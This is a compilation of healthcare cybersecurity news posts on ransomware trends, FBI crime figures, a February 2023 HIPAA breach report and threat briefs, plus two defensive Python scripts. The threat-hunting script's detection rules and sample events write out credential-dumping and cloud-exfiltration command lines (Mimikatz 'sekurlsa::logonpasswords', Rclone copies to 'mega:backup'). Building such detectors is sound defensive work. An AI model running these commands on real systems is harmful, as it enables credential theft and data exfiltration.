Healthcare Cybersecurity

Ransomware Attacks Increased by More Than 51% in February

Ransomware activity increased in February according to the latest GRIT Ransomware Report from GuidePoint Security. The report is based on data collected by the GuidePoint Research and Intelligence Team, which reports a 51.5% increase in attacks compared to January and a 15.8% increase in attacks compared to February 2022.

The LockBit 3.0 ransomware group was particularly active in February, posting more than twice the number of victims (129) on its leak site as in January (50), accounting for virtually all of the monthly increase in attacks. ALPHV/BlackCat also listed more victims (30) on its data leak site than in January (21), with Royal and BianLian in the third and fourth spots. Medusa completed the top 5. There was a 21% decrease in Royal ransomware victims compared to January, but a massive 400% increase in BianLian victims. According to the cybersecurity firm Redacted, the BianLian group appears to have changed tactics and is now increasingly monetizing its breaches without using file encryption, concentrating on extortion after stealing data.

While the healthcare industry is often targeted by ransomware gangs, there was a shift in the industries targeted by ransomware groups in February, with a marked increase in attacks on the food and beverage, banking/financial services, and engineering industries. The GRIT team reports that healthcare was the 7th most targeted sector out of 10 sectors tracked. While the most active ransomware groups do not appear to be primarily targeting the healthcare industry, there are many smaller ransomware groups that are steadily conducting attacks and GuidePoint Security has warned that these smaller groups, which often break away from larger ransomware groups, are more likely than the larger groups to actively target the healthcare sector.

The researchers also drew attention to the Royal ransomware group, which is a relatively new addition to the threat landscape, having only been in operation since September 2022. The group has conducted at least 97 attacks since then, but there is concern that activity will increase. Royal is believed to include members from other ransomware operations such as Conti, and the group is thought to have considerable experience in conducting ransomware attacks. Recently, the Health Sector Cybersecurity Coordination Center issued a warning about Royal ransomware and said the group poses a threat to the healthcare and public health sector. Royal was behind the recent ransomware attack on the medical device manufacturer Reventics, although the majority of the group’s victims so far have been in the technology sector.

As was the case in January, the majority of attacks were on targets in the United States, which experienced 62 attacks in January and 117 attacks in February, although attacks were more geographically spread last month and occurred in 48 countries compared to 38 in January.

The post Ransomware Attacks Increased by More Than 51% in February appeared first on HIPAA Journal.

20% of Ransomware Attacks Involve Victim Harassment

Ransomware gangs are increasingly skipping file encryption and are concentrating on data theft and extortion, according to a recent report from Palo Alto Networks’ Unit 42 team. In the second half of 2021 and throughout 2022, around 1 in 10 attacks by ransomware gangs did not involve file encryption, only data theft and extortion.

Around one-third of incidents responded to by the Unit 42 team are ransomware incidents, 70% of which involve data theft, up from 40% of attacks in mid-2021. Data from Coveware indicates more victims of ransomware attacks are now refusing to pay ransom demands, and that has forced ransomware gangs to adopt more aggressive tactics. The Unit 42 team says, on average, ransomware gangs upload the data of 7 victims a day to their data leak sites, and it is becoming increasingly common for ransomware gangs to harass victims. 20% of the incidents Unit 42 responds to have some degree of victim harassment, compared to around 1% of attacks in mid-2021.

Michael Sikorski, CTO and VP of threat intelligence at Unit 42, said an attack on a hospital that refused to pay the ransom saw the threat actor contact patients and threaten to publish their medical records to pile pressure on the hospital to pay the ransom demand. In another case, the wife of the CEO of a company was sent threatening SMS messages when the ransom was not paid. When patients or customers of companies are contacted and harassed by a threat actor, the reputational damage caused can result in a considerable loss of business. Sikorski said victims of ransomware attacks are increasingly recovering files from backups and refusing to pay ransoms, but the harassment tactics could well see that trend reversed.

Organizations need to develop and practice an incident response plan to ensure the quickest possible recovery from a ransomware attack but Palo Alto Networks suggests it is also now vital to prepare a playbook for multi-extortion and to develop crisis communication protocols. “Having a comprehensive incident response plan with corresponding crisis communication protocols will greatly reduce uncertainty. It’s important to know which stakeholders should be involved, and the process to make decisions promptly (e.g., whether or not to pay, or who is authorized to approve payments).” It is important to know what to do – and not to do – when ransomware gangs start contacting and harassing employees or patients. Employees should be provided with ransomware harassment training and the tools and processes they need to follow during an active harassment incident. Having a playbook for multi-extortion will help to limit the harm that can be caused.


FBI: Losses to Cybercrime Increased by 49% in 2022 to $10.3 Billion

The Federal Bureau of Investigation (FBI) has published its 2022 Internet Crime Report, which shows at least $10.3 billion was lost to cybercrime in 2022, up 49% ($3.4 billion) from 2021, despite a 5% reduction in complaints (800,944). Over the past 5 years, the FBI Internet Crime Complaint Center (IC3) has received reports of losses of more than $27.6 billion across 3.26 million complaints to IC3.

FBI data show a 36% year-over-year decrease in ransomware attacks, which fell from 3,729 complaints in 2021 to 2,385 complaints in 2022. Despite this decrease, the FBI says ransomware still poses a significant threat, especially to the healthcare sector which ranked top out of 16 critical infrastructure sectors for ransomware attacks in 2022 and actually saw an increase in complaints. 210 ransomware complaints were filed with IC3 in 2022 by healthcare organizations compared to 148 in 2021. The FBI has observed an increase in double extortion tactics in ransomware attacks, where data are stolen in addition to file encryption and payment is required to obtain the decryption keys and to prevent the publication or sale of stolen data. LockBit was the most prolific ransomware actor with 149 reported attacks, ALPHV/BlackCat was second with 114 attacks, and Hive was 3rd with 87 attacks.

Several cybercriminal groups that have historically used ransomware in their attacks have switched to extortion-only attacks, involving data theft and ransom demands but no file encryption. The FBI’s data shows extortion attacks have remained flat, increasing only slightly from 39,360 complaints in 2021 to 39,416 complaints in 2022.

Phishing remains one of the most common attack vectors, although reported phishing attacks fell by 7% year over year to 300,497 incidents. Even with that decrease, phishing is still the most common crime type in terms of victim count ahead of personal data breaches with 58,859 complaints and non-payment/non-delivery with 51,679 complaints.

Business email compromise (BEC) ranked 9th out of all crime types in terms of complaints but ranked 2nd in terms of reported losses with $2,742,354,049 lost to BEC attacks in 2022. BEC attacks increased 9% year-over-year although losses to the scams were down almost 14.5%. BEC was knocked from the top spot this year by investment scams, which saw $3,311,742,206 in reported losses, up 127% from 2021. The FBI reports an unprecedented increase in crypto investment schemes in 2022 in terms of both victim count and losses.

There was a major increase in tech support scams in 2022, which rose to 3rd place in terms of losses. Tech support scam complaints increased by 36% year-over-year to 32,538 complaints and losses to these scams increased by almost 132% to $806,551,993.

The FBI stressed the importance of reporting instances of cybercrime of any type and confirmed assistance will be provided to try to recover losses. The IC3 Recovery Asset Team (RAT) has a 73% success rate in freezing funds and limiting losses and has frozen $433.30 million in funds out of $590.62 million in reported losses across 2,838 incidents.


February 2023 Healthcare Data Breach Report

The number of healthcare data breaches reported over the past three months has remained fairly flat, with only a small uptick in breaches in February, which saw 43 data breaches of 500 or more records reported to the HHS’ Office for Civil Rights (OCR), well below the 12-month average of 57.4 reported breaches a month. An average of 41 data breaches have been reported each month over the past 3 months, compared to an average of 50.6 breaches per month for the corresponding period last year.

February 2023 Healthcare Data Breach Report - Records breached

The downward trend in breached records did not last long. There was a sizeable month-over-month increase in breached records, jumping by 418.7% to 5,520,291 records. February was well above the monthly average of 4,472,186 breached records a month, with the high total largely due to a single breach that affected more than 3.3 million individuals.


Largest Healthcare Data Breaches Reported in February 2023

17 healthcare data breaches of 10,000 or more records were reported in February, all of which were hacking incidents. The largest data breach affected 3,300,638 patients of 4 medical groups in California that are part of the Heritage Provider Network – Regal Medical Group, Inc.; Lakeside Medical Organization, A Medical Group, Inc.; ADOC Acquisition Co., A Medical Group Inc.; & Greater Covina Medical Group, Inc. This was a ransomware attack with confirmed data theft and was, at the time of reporting, the largest healthcare data breach of the year. That record did not stand for long, as a 4.4 million-record breach was reported this month (Independent Living Systems).

Hacking incidents were reported by CentraState Healthcare System in New York (617,901 records), Cardiovascular Associates in Alabama (441,640 records), and the Florida-based revenue cycle management company, Reventics (250,918 records), all of which saw sensitive data exfiltrated. It is unclear whether these incidents were ransomware or extortion attacks. An email account breach at Highmark Inc. rounds out the top five. That incident was reported to the HHS’ Office for Civil Rights as two separate breaches, affecting 239,039 and 36,600 individuals – 275,639 in total. The breach occurred as a result of an employee clicking a link in a phishing email.

The full list of 10,000+ record data breaches and their causes are detailed in the table below.

Name of Covered Entity | State | Covered Entity Type | Individuals Affected | Cause of Breach
Regal Medical Group, Inc., Lakeside Medical Organization, A Medical Group, Inc., ADOC Acquisition Co., A Medical Group Inc. & Greater Covina Medical Group, Inc. | CA | Healthcare Provider | 3,300,638 | Ransomware attack (data theft confirmed)
CentraState Healthcare System, Inc. | NJ | Healthcare Provider | 617,901 | Hacking incident (data theft confirmed)
Cardiovascular Associates | AL | Healthcare Provider | 441,640 | Hacking incident (data theft confirmed)
Reventics, LLC | FL | Business Associate | 250,918 | Hacking incident (data theft confirmed)
Highmark Inc | PA | Health Plan | 239,039 | Phishing attack
90 Degree Benefits, Inc. | WI | Business Associate | 175,000 | Hacking incident
Hutchinson Clinic, P.A. | KS | Healthcare Provider | 100,000 | Hacking incident
Lawrence General Hospital | MA | Healthcare Provider | 76,571 | Hacking incident
Sharp Healthcare | CA | Healthcare Provider | 62,777 | Hacked web server (data theft confirmed)
Rise Interactive Media & Analytics, LLC | IL | Business Associate | 54,509 | Hacking incident
Highmark Inc | PA | Business Associate | 36,600 | Phishing attack
Teijin Automotive Technologies Welfare Plan | MI | Health Plan | 25,464 | Ransomware attack – Access gained through phishing
Evergreen Treatment Services | WA | Healthcare Provider | 21,325 | Hacking incident
Aloha Nursing Rehab Centre | HI | Healthcare Provider | 20,216 | Hacking incident (data theft confirmed)
NR Pennsylvania Associates, LLC | PA | Healthcare Provider | 14,335 | Hacking incident (data theft confirmed)
Intelligent Business Solutions | NC | Business Associate | 11,595 | Ransomware attack
Arizona Health Advantage, Inc. dba Arizona Priority Care; AZPC Clinics, LLC; and health plans for which APC has executed a BAA | AZ | Healthcare Provider | 10,978 | Ransomware attack

Causes of Healthcare Data Breaches in February 2023

Hacking and other IT incidents dominated the breach reports in February with 33 such incidents reported, accounting for 76.7% of all breaches reported in February. Across those incidents, the records of 5,497,797 individuals were exposed or stolen – 99.59% of the breached records in February. The average breach size was 166,600 records and the median breach size was 10,978 records.

There were 8 unauthorized access/disclosure incidents reported involving a total of 13,950 records. The average breach size was 1,744 records and the median breach size was 689 records. One of the incidents – reported by Asante – involved a physician accessing the records of patients when there was no treatment relationship. The unauthorized access occurred for 9 years before it was detected, during which time the records of 8,834 patients were impermissibly viewed. Incidents such as this show why it is important to maintain logs of medical record access and to review those logs regularly, ideally automating the process using a monitoring and alerting system.
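The Asante incident above is the classic case an access-log review should catch: chart views by a user who has no documented treatment relationship with the patient. The following is an added example, not code from HIPAA Journal or any EHR vendor; it assumes two constructed exports, an encounter roster and a chart-access audit trail, and flags views with no encounter within a configurable window, then summarizes per user so that long-running patterns stand out.

```python
"""Flag EHR chart views that lack a documented treatment relationship.

Added example (not from the original post). The CSV text below is
constructed sample data standing in for an EHR scheduling export and a
record-access audit log; column names are assumptions.
"""
from __future__ import annotations

import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample: documented encounters (who treated whom, and when).
ENCOUNTERS_CSV = """\
user_id,patient_id,encounter_date
dr_a,p1001,2023-02-01
dr_a,p1002,2023-02-03
dr_b,p1003,2023-02-05
"""

# Constructed sample: record-access audit trail, one row per chart view.
ACCESS_LOG_CSV = """\
ts,user_id,patient_id,action
2023-02-01T09:12:00,dr_a,p1001,VIEW_CHART
2023-02-02T14:40:00,dr_a,p1002,VIEW_CHART
2023-02-06T08:05:00,dr_a,p1003,VIEW_CHART
2023-02-06T08:07:00,dr_a,p1004,VIEW_CHART
2023-02-06T10:00:00,dr_b,p1003,VIEW_CHART
2023-02-07T23:55:00,dr_a,p1005,VIEW_CHART
2023-06-01T11:30:00,dr_b,p1003,VIEW_CHART
"""

# An encounter this close to a view (before or after) explains the view.
WINDOW = timedelta(days=30)


def load_encounters(text: str) -> dict[tuple[str, str], list[datetime]]:
    """Map (user, patient) -> encounter dates: the documented treatment relationships."""
    rel: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    for row in csv.DictReader(StringIO(text)):
        rel[(row["user_id"], row["patient_id"])].append(
            datetime.strptime(row["encounter_date"], "%Y-%m-%d")
        )
    return rel


def unexplained_views(log_text: str, encounters, window: timedelta = WINDOW) -> list[dict]:
    """Return audit rows whose viewer has no encounter with that patient within `window`."""
    flagged = []
    for row in csv.DictReader(StringIO(log_text)):
        ts = datetime.fromisoformat(row["ts"])
        dates = encounters.get((row["user_id"], row["patient_id"]), [])
        if not any(abs(ts - d) <= window for d in dates):
            flagged.append({**row, "ts": ts})
    return flagged


def summarize_by_user(flagged: list[dict]) -> dict[str, dict]:
    """Per-user count, distinct patients and span in days.

    Many distinct patients over a long span (the Asante case ran for
    9 years) is the pattern a periodic review should escalate first.
    """
    by_user: dict[str, dict] = {}
    for ev in flagged:
        s = by_user.setdefault(
            ev["user_id"],
            {"views": 0, "patients": set(), "first": ev["ts"], "last": ev["ts"]},
        )
        s["views"] += 1
        s["patients"].add(ev["patient_id"])
        s["first"] = min(s["first"], ev["ts"])
        s["last"] = max(s["last"], ev["ts"])
    return {
        u: {
            "views": s["views"],
            "patients": len(s["patients"]),
            "span_days": (s["last"] - s["first"]).days,
        }
        for u, s in by_user.items()
    }


if __name__ == "__main__":
    hits = unexplained_views(ACCESS_LOG_CSV, load_encounters(ENCOUNTERS_CSV))
    for ev in hits:
        print(f"{ev['ts'].isoformat()} {ev['user_id']} viewed {ev['patient_id']} with no encounter")
    for user, s in sorted(summarize_by_user(hits).items(), key=lambda kv: -kv[1]["views"]):
        print(f"{user}: {s['views']} unexplained views, {s['patients']} patients, {s['span_days']} days")
```

In a real deployment the roster would also include covering physicians, on-call rotations and break-the-glass justifications, otherwise legitimate cross-coverage shows up as noise.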

February 2023 Healthcare Data Breach Report - Causes

One theft incident was reported involving a portable electronic device containing the PHI of 986 patients and one incident involved the improper disposal of paper records that contained the PHI of 7,558 patients.

February 2023 Healthcare Data Breach Report - Location PHI

What HIPAA-Regulated Entities were Affected?

Healthcare providers were the worst affected HIPAA-regulated entity in February, with 31 data breaches of 500 or more records. Seven data breaches were reported by business associates and five were reported by health plans. When data breaches involve business associates, they are often reported by the covered entity. In February, 6 data breaches involved business associates but were reported by the affected healthcare providers and health plans. The two charts are based on where the breach occurred rather than who reported it.

February 2023 Healthcare Data Breach Report - Reporting Entities

The average healthcare provider breach exposed 178,046 records (median: 3,061 records), the average health plan data breach exposed 67,236 records (median: 3,909 records), and the average business associate data breach involved 47,859 records (median: 8,500 records).

February 2023 Healthcare Data Breach Report - records by reporting entity

Where Did the Breaches Occur?

Data breaches were reported by HIPAA-covered entities and business associates in 28 states, with California being the worst affected state with 4 breaches reported in February.

State Breaches
California 4
Pennsylvania & Texas 3
Arizona, Illinois, Kansas, Massachusetts, New Jersey, Oregon, Virginia & Washington 2
Alabama, Colorado, Connecticut, Florida, Georgia, Hawaii, Iowa, Maryland, Michigan, New Hampshire, New Mexico, North Carolina, Rhode Island, Tennessee, Utah, Wisconsin & Wyoming 1

HIPAA Enforcement Activity in February 2023

The HHS’ Office for Civil Rights announced one enforcement action in February to resolve alleged violations of the HIPAA Rules. OCR investigated Banner Health over a 2016 breach of the protected health information of 2.81 million individuals and identified multiple potential HIPAA violations related to risk analyses, system activity reviews, verification of identity for access to PHI, and technical safeguards. Banner Health agreed to settle the case and paid a $1,125,000 financial penalty.

DNA Diagnostics Center was investigated by the Attorneys General in Pennsylvania and Ohio after a reported breach of the personal and health information of 45,600 state residents. The investigation determined there was a lack of safeguards, a failure to update its asset inventory, and a failure to disable or remove assets that were not used for business purposes. While these failures would have been HIPAA violations, the settlement resolved violations of state laws. DNA Diagnostics Center paid a financial penalty of $400,000, which was split equally between the two states.

In February, the Federal Trade Commission (FTC) announced its first-ever settlement to resolve a violation of the FTC Health Breach Notification Rule. While the Rule has been in effect for a decade, the FTC has never enforced it. That has now changed. The FTC stated last year that it would be holding non-HIPAA-covered entities accountable for impermissible disclosures of health information and breach notification failures. GoodRx Holdings Inc. was found to have used tracking technologies on its website that resulted in unauthorized disclosures of personal and health information to Facebook, Google, and other third parties and failed to issue notifications to affected individuals. The allegations were settled and GoodRx paid a $1,500,000 financial penalty.


Feds Release Updated Threat Intelligence on LockBit 3.0 Ransomware

A joint cybersecurity advisory has been issued by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) about LockBit 3.0 ransomware, also known as LockBit Black.

The LockBit ransomware group has been in operation since at least September 2019 and is one of the most prolific ransomware groups. The group conducted more attacks than any other ransomware operation in 2022 and it has been estimated that LockBit ransomware is involved in around 40% of all ransomware attacks worldwide. The group is believed to have conducted more than 1,000 attacks on organizations in the United States and has generated more than $100 million in ransom payments.

LockBit is a ransomware-as-a-service operation that recruits affiliates to conduct attacks in return for a cut of the ransoms they generate. The group engages in double extortion tactics, where files are stolen prior to encryption and threats are issued to publish or sell the stolen data if the ransom is not paid. Victims are usually small- to medium-sized organizations, although attacks on large organizations are not unknown. The ransom demands average at around $85,000 per victim.

The ransomware is actively developed and evolved into LockBit 2.0 in 2021, and LockBit 3.0 in June 2022. LockBit 3.0 has capabilities similar to BlackMatter ransomware, and it is possible some of the same code has been used. Initial access to victim networks is gained through a variety of methods, including purchasing access from initial access brokers, insider access, exploiting unpatched and zero-day vulnerabilities, phishing, and Remote Desktop Protocol (RDP) exploitation. Affiliates use a custom data exfiltration tool called Stealbit; the open-source command line cloud storage manager, rclone; and publicly available file sharing services such as MEGA to exfiltrate stolen data.

The group was behind attacks on the NHS vendor, Advanced, which affected 16 customers in the health and social care sector; the German auto parts company, Continental; the IT firm Accenture; the UK’s Royal Mail, and many more. In December 2022, a LockBit affiliate attacked The Hospital for Sick Children (SickKids) in Toronto. The group issued an apology for the attack and provided a free decryptor, and claimed the affiliate was kicked out for violating its terms and conditions which prohibit attacks on “medical institutions” where attacks could result in death, including cardiology centers, neurosurgical departments, and maternity hospitals. The group does, however, permit attacks on pharma firms, dentists, and plastic surgeons. These policies are not always enforced, as LockBit affiliates have conducted attacks on hospitals in the past where free decryptors were not provided, such as the attack on the Center Hospitalier Sud Francilien (CHSF) in France.

The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) issued a threat brief about LockBit 3.0 in December 2022 in response to known attacks on the Healthcare and Public Health (HPH) sector, and despite the group’s claims, HC3 believes LockBit 3.0 poses a threat to the HPH sector. The joint cybersecurity alert from the FBI, CISA, and MS-ISAC provides details of the latest tactics, techniques, and procedures (TTPs) associated with the group, Indicators of Compromise (IoCs) and technical information for network defenders, and recommended mitigations for improving cybersecurity posture.


Senate Committee Told How Federal Government Can Improve Healthcare Cybersecurity

On Thursday last week, the U.S. Senate Committee on Homeland Security and Governmental Affairs held a hearing to examine cybersecurity risks to the healthcare sector, how healthcare providers and the federal government are working to combat those threats, and determine what the federal government needs to do to improve defenses against cyberattacks on the healthcare sector.

“Relentless cyber-attacks show that foreign adversaries and cybercriminals will stop at nothing to exploit cybersecurity vulnerabilities in our critical infrastructure and most essential systems,” said Committee Chairman, Gary C. Peters (D-MI). “What is most concerning about these attacks is that they don’t just compromise personal information, they can actually affect patient health and safety.”

Peters explained that the committee has already taken important steps to strengthen cybersecurity for critical infrastructure sectors, including healthcare. Among them is advancing a bipartisan bill requiring critical infrastructure organizations to report cyber-attacks and ransomware payments to the Cybersecurity and Infrastructure Security Agency (CISA), which would provide more transparency and situational awareness for cybersecurity defenses and enable CISA to warn potential victims of ongoing attacks. He accepted, however, that Congress can do much more to ensure critical networks in the healthcare and public health sector remain resilient against cyber-attacks.

At the hearing, testimonies were provided by Scott Dresden, SVP and CISO, Corewell Health; Kate Pierce, Senior Virtual Information Security Officer, Fortified Health Security; Greg Garcia, Executive Director, Cyber Security Healthcare and Public Health Sector Coordinating Council; and Stirling Martin, SVP & Chief Privacy and Security Officer, Epic Systems.

Scott Dresden, SVP and CISO, Corewell Health

Scott Dresden explained that the healthcare sector is particularly vulnerable to cyberattacks due to the complex healthcare business model, which often involves multiple, often independent, entities coming together to form what the patient sees as a cohesive care delivery process. “Over time and often out of necessity, this model has evolved in ways that have made us more vulnerable to cyber-attacks,” said Dresden. “For example, the rapid expansion of network-connected technologies to provide telehealth during the COVID-19 pandemic” and the “expanded use of Software as a Service and other cloud-based solutions.” These have increased the attack surface considerably and provided many opportunities for threat actors to compromise an organization.

Dresden explained that it is vital to implement a comprehensive information security program but there is great disparity across the industry. While large health systems have the resources to create an effective security team, that is far more difficult for small and medium-sized healthcare organizations, and even large health systems with mature security programs are still being compromised. Dresden has called for the U.S. government to respond to cyber threats more effectively and automate the sharing of the actionable threat intelligence the government acquires with the healthcare sector. Doing so would enable rapid, near real-time automatic ingestion of threat intelligence into the technologies participating members use to protect their respective organizations.

The HHS’ Office for Civil Rights has recently called for Congress to increase the penalty caps for HIPAA violations to help address its budget shortfall, but Dresden does not believe this is a wise move. “We understand and support the legislative intent to encourage adoption of best practices and the implementation of appropriate protections to safeguard our data,” said Dresden. “However, penalizing victims of cyberattacks, when defensive measures can’t keep up with the sophistication of hackers, is not the fair approach.”

Kate Pierce, Senior Virtual Information Security Officer, Fortified Health Security

Kate Pierce, who prior to joining Fortified Health Security served as CIO and CISO at a 25-bed community hospital in Vermont for 21 years, drew attention to the cybersecurity gaps at small rural hospitals, which face severe financial and staffing constraints and struggle to recruit cybersecurity talent. While recommended cybersecurity best practices in voluntary guidance can be adopted by large healthcare organizations, at small, under-resourced hospitals they simply won’t be implemented. She recommends introducing mandatory minimum security standards, as without that requirement, cybersecurity will not be prioritized over other pressing needs. She also explained that mandatory security standards are important, but small healthcare providers will also need to be given the means to implement the required security measures. Pierce also drew attention to the difficulty rural hospitals face obtaining cyber insurance coverage, and that even if coverage can be obtained, the rates are between 35% and 75% higher than for larger healthcare organizations and there are typically far more exclusions. Small healthcare organizations rely on cyber insurance to ensure they can recover from cyberattacks.

Stirling Martin, SVP & Chief Privacy and Security Officer, Epic Systems

Stirling Martin drew attention to the current staffing shortages and the difficulty healthcare organizations have attracting and retaining high-demand security talent. He explained that Epic has seen huge variation in the sophistication of security programs at healthcare providers across the country and says there is no defined benchmark of what security practices are considered sufficient. He also said there is a lack of cybersecurity information sharing among healthcare organizations and limited threat intelligence from government agencies and private industry. Martin has called for the government to step in and help address the current talent shortage and suggests the federal government could develop security training programs and incentivize newly trained professionals to work in healthcare. He also suggests federal agencies such as CISA or NIST could develop a single set of prescriptive security practices for the healthcare industry, or for there to be industry efforts such as HITRUST or collaboration such as the Healthcare Sector Coordinating Council.

Greg Garcia, Executive Director, Cyber Security Healthcare and Public Health Sector Coordinating Council

Greg Garcia provided an overview of cyber threat, vulnerability, and data breach trends, an outline of how the industry and government agencies have been working together to address cybersecurity, and made several recommendations on how the government can support the health industry’s efforts to improve security.

The recommendations include augmenting the HHS 405(d) program, which already has a successful track record of partnership with the healthcare industry; creating a Healthcare Cybersecurity Workforce Development Program to address the staffing challenges; providing financial support to help healthcare organizations improve cybersecurity; and to increase funding for HHS Health Sector Cyber Coordination Center (HC3) to expand its ability to be a knowledge sharing and analysis resource for the sector.

With budgets already stretched, dealing with the multiple class action lawsuits that are filed following a data breach can be a huge financial drain on healthcare organizations, and the money spent defending lawsuits would be better spent on improving cybersecurity to prevent further data breaches. Garcia suggests health delivery organizations should be protected from class action lawsuits if they demonstrate they have implemented recognized security practices such as the NIST CSF or HICP.

Garcia also recommended updating HIPAA to reference the use of minimum standards in NIST CSF, HICP, or other recognized security practices, rather than prescribing cybersecurity requirements in statute. “These standards should be built in partnership with the HSCC and regulators (such as OCR, ONC, CMS, and FDA) and cross-mapped for overlap or conflict where the various regulatory regimes intersect,” said Garcia. “A holistic, coherent cyber policy strategy is essential for a healthcare environment where clinical operations, medical devices, electronic health record technology, patient data, and IT systems are all interconnected but subject to different regulatory structures and authorities.”


HC3 Shares Black Basta Ransomware Threat Intelligence Data

The Health Sector Cybersecurity Coordination Center (HC3) has shared threat intelligence information about the Black Basta ransomware group to help network defenders prevent and rapidly detect attacks in progress. The Black Basta group was first identified in April 2022 and is known to conduct ransomware and extortion attacks. The group engages in double extortion tactics, exfiltrating sensitive data and encrypting files, then issues threats to publish the data on its data leak site if the ransom is not paid. The group is also known to conduct extortion-only attacks without file encryption.

While the group has only been in operation for a relatively short time, it is clear that the group has extensive experience in ransomware attacks, as in the first two weeks of operation the group is known to have conducted at least 20 ransomware attacks. The Russian-speaking threat group is believed to include former members of the Conti and BlackMatter ransomware operations and uses similar tactics, techniques, and procedures to those groups and is thought to have links to the FIN7 threat group. It is highly probable that the group has conducted ransomware attacks in the past under a different name, with some security researchers believing Black Basta is a rebrand of Conti. Conti was officially disbanded in May 2022 and it is thought that the group split into several smaller operations.

Black Basta consists of highly capable individuals well versed in ransomware attacks. The group has attacked several Healthcare and Public Health (HPH) sector organizations, including health information technology companies, healthcare industry service providers, laboratories and pharmaceutical firms, and health plans. The vast majority of its victims are in the United States, although the group has begun attacking organizations in other countries, primarily the Five Eyes countries (USA, Australia, Canada, New Zealand, and the United Kingdom).

Black Basta is known for choosing its targets carefully and has attacked many critical infrastructure entities. The attacks are believed to be financially motivated rather than directed by the Russian government, although the countries it typically targets suggest the group may also have some sort of political agenda. The group does not rely on a single method of attack and often tailors its approach to a specific target. It is known to purchase access to networks from initial access brokers; other routes in include exploitation of vulnerabilities, exposed Remote Desktop Protocol (RDP) services, phishing, web injections, malicious downloads, and repackaged or infected software installers. Once inside, the group uses a familiar toolset for remote access, privilege escalation, lateral movement, and data exfiltration: the Qakbot/QBot loader, the SystemBC proxy backdoor, Mimikatz for credential theft, Cobalt Strike for command and control and lateral movement, and Rclone for exfiltrating data to cloud storage.
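The toolset above lends itself to endpoint hunting on process-creation telemetry. The Python script below is an added example, not part of the HC3 report or this article: it runs a few command-line heuristics over constructed process-creation events, looking for a renamed Rclone binary (keyed on its command grammar rather than its file name), Mimikatz module syntax, regsvr32 silently registering a DLL from a user-writable path (a common Qakbot loader pattern), and an argument-less rundll32, the default spawnto for Cobalt Strike post-exploitation jobs. The event fields, rule names, and sample events are assumptions made for the demo, not HC3's published indicators, and every rule is a heuristic that needs tuning against your own baseline.

```python
"""Added example (not from HC3 or HIPAA Journal): hunting process-creation
events for the tooling the HC3 report attributes to Black Basta.

The events below are constructed for the demo and the rules are illustrative
heuristics written for this example, not HC3's published indicators."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str      # full path of the new process (Sysmon EID 1 "Image" style)
    cmdline: str
    parent: str     # file name of the parent process


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


# Rclone is often renamed, so key off its command grammar: a transfer verb plus
# either a remote spec ("name:path", two or more chars before the colon so
# Windows drive letters do not match, and not "scheme://") or a --config file.
_RCLONE_VERB = re.compile(r"\b(copy|copyto|sync|move|moveto)\b")
_RCLONE_REMOTE = re.compile(r"(?<![\w\\/])[a-z][a-z0-9_-]+:(?!//)")


def rule_rclone(e: ProcEvent) -> bool:
    cmd = e.cmdline.lower()
    if _basename(e.image) == "rclone.exe":
        return True
    return bool(_RCLONE_VERB.search(cmd)) and (
        "--config" in cmd or bool(_RCLONE_REMOTE.search(cmd)))


# Mimikatz module syntax: wrappers and renamed builds still pass these through.
_MIMIKATZ = ("sekurlsa::", "lsadump::", "privilege::debug", "kerberos::golden")


def rule_mimikatz(e: ProcEvent) -> bool:
    cmd = e.cmdline.lower()
    return _basename(e.image) == "mimikatz.exe" or any(m in cmd for m in _MIMIKATZ)


# Qakbot-style loader heuristic: regsvr32 /s registering a DLL that lives in a
# user-writable location rather than under Program Files or System32.
_USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def rule_regsvr32_user_dll(e: ProcEvent) -> bool:
    cmd = e.cmdline.lower()
    return (_basename(e.image) == "regsvr32.exe"
            and " /s " in f" {cmd} "
            and any(p in cmd for p in _USER_WRITABLE))


# Cobalt Strike heuristic: an argument-less rundll32.exe (the default spawnto)
# is something legitimate software almost never launches.
def rule_rundll32_no_args(e: ProcEvent) -> bool:
    if _basename(e.image) != "rundll32.exe":
        return False
    tokens = e.cmdline.strip().strip('"').split()
    return len(tokens) == 1  # only the executable: no DLL, no entry point


RULES = [
    ("rclone_transfer", rule_rclone),
    ("mimikatz_module", rule_mimikatz),
    ("regsvr32_user_writable_dll", rule_regsvr32_user_dll),
    ("rundll32_no_args", rule_rundll32_no_args),
]


def hunt(events):
    """Return one hit per (event, matching rule), in input order."""
    hits = []
    for e in events:
        for name, rule in RULES:
            if rule(e):
                hits.append({"rule": name, "host": e.host, "user": e.user,
                             "image": _basename(e.image), "parent": e.parent})
    return hits


# Constructed sample events: five that should fire, three that should not.
SAMPLE_EVENTS = [
    ProcEvent("ws17", "corp\\alice", r"C:\ProgramData\svchost.exe",
              r'svchost.exe copy "C:\Shares\Finance" mega:backup --config C:\ProgramData\r.conf -q',
              "cmd.exe"),
    ProcEvent("ws17", "corp\\alice", r"C:\ProgramData\rc.exe",
              r"rc.exe sync C:\Shares\HR s3:exfil-bucket/hr -P", "powershell.exe"),
    ProcEvent("dc01", "corp\\svc_backup", r"C:\Users\Public\m.exe",
              'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit', "cmd.exe"),
    ProcEvent("ws22", "corp\\bob", r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s C:\Users\bob\AppData\Local\Temp\invoice.dll", "explorer.exe"),
    ProcEvent("ws22", "corp\\bob", r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\rundll32.exe", "winword.exe"),
    ProcEvent("fs01", "corp\\backupjob", r"C:\Windows\System32\Robocopy.exe",
              r"robocopy.exe C:\Data D:\Backup /MIR", "cmd.exe"),
    ProcEvent("ws05", "corp\\carol", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\ctrl.dll"', "msiexec.exe"),
    ProcEvent("ws05", "corp\\carol", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL", "explorer.exe"),
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f"{h['rule']:28} {h['host']:5} {h['user']:16} {h['image']} (parent {h['parent']})")
```

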